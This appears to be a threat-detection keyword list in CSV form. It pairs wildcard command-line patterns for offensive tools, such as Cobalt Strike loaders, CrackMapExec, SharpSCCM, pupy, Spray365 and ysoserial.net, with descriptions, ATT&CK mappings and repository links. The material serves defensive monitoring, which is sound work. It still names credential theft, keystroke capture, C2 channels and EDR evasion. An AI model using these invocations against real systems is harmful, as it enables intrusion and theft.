syscalls_mem*,offensive_tool_keyword,SysWhispers3,SysWhispers on Steroids - AV/EDR evasion via direct system calls.,T1059 - T1573 - T1218 - T1216,TA0002 - TA0008 - TA0011,N/A,N/A,Defense Evasion,https://github.com/klezVirus/SysWhispers3,1,0,N/A,N/A,10,1006,148,2023-03-22T19:23:21Z,2022-03-07T18:56:21Z -* fuzz -u * -p *--target*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,0,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -* FUZZ:FUZZ *,offensive_tool_keyword,wfuzz,Web application 
fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* --fuzzers addition*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers bitsquatting*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers cyrillic*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers dictionary*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers homoglyph*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers hyphenation*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers insertion*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers omission*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. 
and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers repetition*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers replacement*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers subdomain*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers transposition*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. 
phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* --fuzzers vowel-swap*,offensive_tool_keyword,dnstwist,See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.,T1560 - T1565 - T1566 - T1568 - T1569,TA0002 - TA0005,N/A,N/A,Phishing,https://github.com/elceef/dnstwist,1,0,N/A,3,10,4154,709,2023-10-01T22:26:34Z,2015-06-11T12:24:17Z -* -g ActivitySurrogateSelector*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* -g ClaimsPrincipal *,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* -g -n --kerberoast*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -g PSObject *,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - 
TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* -g TextFormattingRunProperties *,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* --gadget ActivitySurrogateSelector*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* --gadget ClaimsPrincipal *,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* --gadget PSObject *,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -* ganglia-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* GC2-sheet*,offensive_tool_keyword,GC2-sheet,GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.,T1071.002 - T1560 - T1105,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/looCiprian/GC2-sheet,1,0,N/A,10,10,449,89,2023-07-06T19:22:36Z,2021-09-15T19:06:12Z -* gcat.py -*,offensive_tool_keyword,gcat,A PoC backdoor that uses Gmail as a C&C server,T1071.001 - T1094 - T1102.002,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/byt3bl33d3r/gcat,1,0,N/A,10,10,1300,466,2018-11-16T13:43:15Z,2015-06-03T01:28:00Z -* gen -f client -O windows -A x64*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* gen -S -f client -O windows -A x64*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* generate audit -ep *--passwords_in_userfile*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,0,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -* generate normal -ep * -d * -u * -pf *,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,0,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -* generate normal -ep ex-plan.s365 *,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,0,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -* generate_my_dll*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,0,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -* generatePayload*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* --gen-relay-list *,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* --gen-relay-list /tmp/relaylistOutputFilename.txt*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* get class-instances SMS_R_System *,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* get class-properties SMS_Admin*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* get collection-members -n USERS*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* get primary-users -u *,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* get site-push-settings*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* get_keystrokes*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* get_netdomaincontroller*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* get_netrdpsession*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* get_rooot *,offensive_tool_keyword,POC,Exploit for CVE-2022-27666,T1550 - T1555 - T1212 - T1558,TA0005,N/A,N/A,Exploitation tools,https://github.com/plummm/CVE-2022-27666,1,0,N/A,N/A,3,203,41,2022-03-28T18:21:00Z,2022-03-23T22:54:28Z -* get_timedscreenshot*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* GetAppLockerPolicies*,offensive_tool_keyword,cobaltstrike,A Visual Studio template used to create Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/securifybv/Visual-Studio-BOF-template,1,0,N/A,10,10,210,46,2021-11-17T12:03:42Z,2021-11-13T13:44:01Z -* GetLsassPid*,offensive_tool_keyword,cobaltstrike,A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - 
T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,0,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z -* getprivs.c *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -* getprivs.o *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -* 
Get-SpoolStatus.ps1*,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,0,N/A,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z -* --get-syscallstub *,offensive_tool_keyword,Nimcrypt2,.NET PE & Raw Shellcode Packer/Loader Written in Nim,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/icyguider/Nimcrypt2,1,0,N/A,N/A,7,651,113,2023-01-20T22:07:15Z,2022-02-23T15:43:16Z -* -GHUser * -GHRepo *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
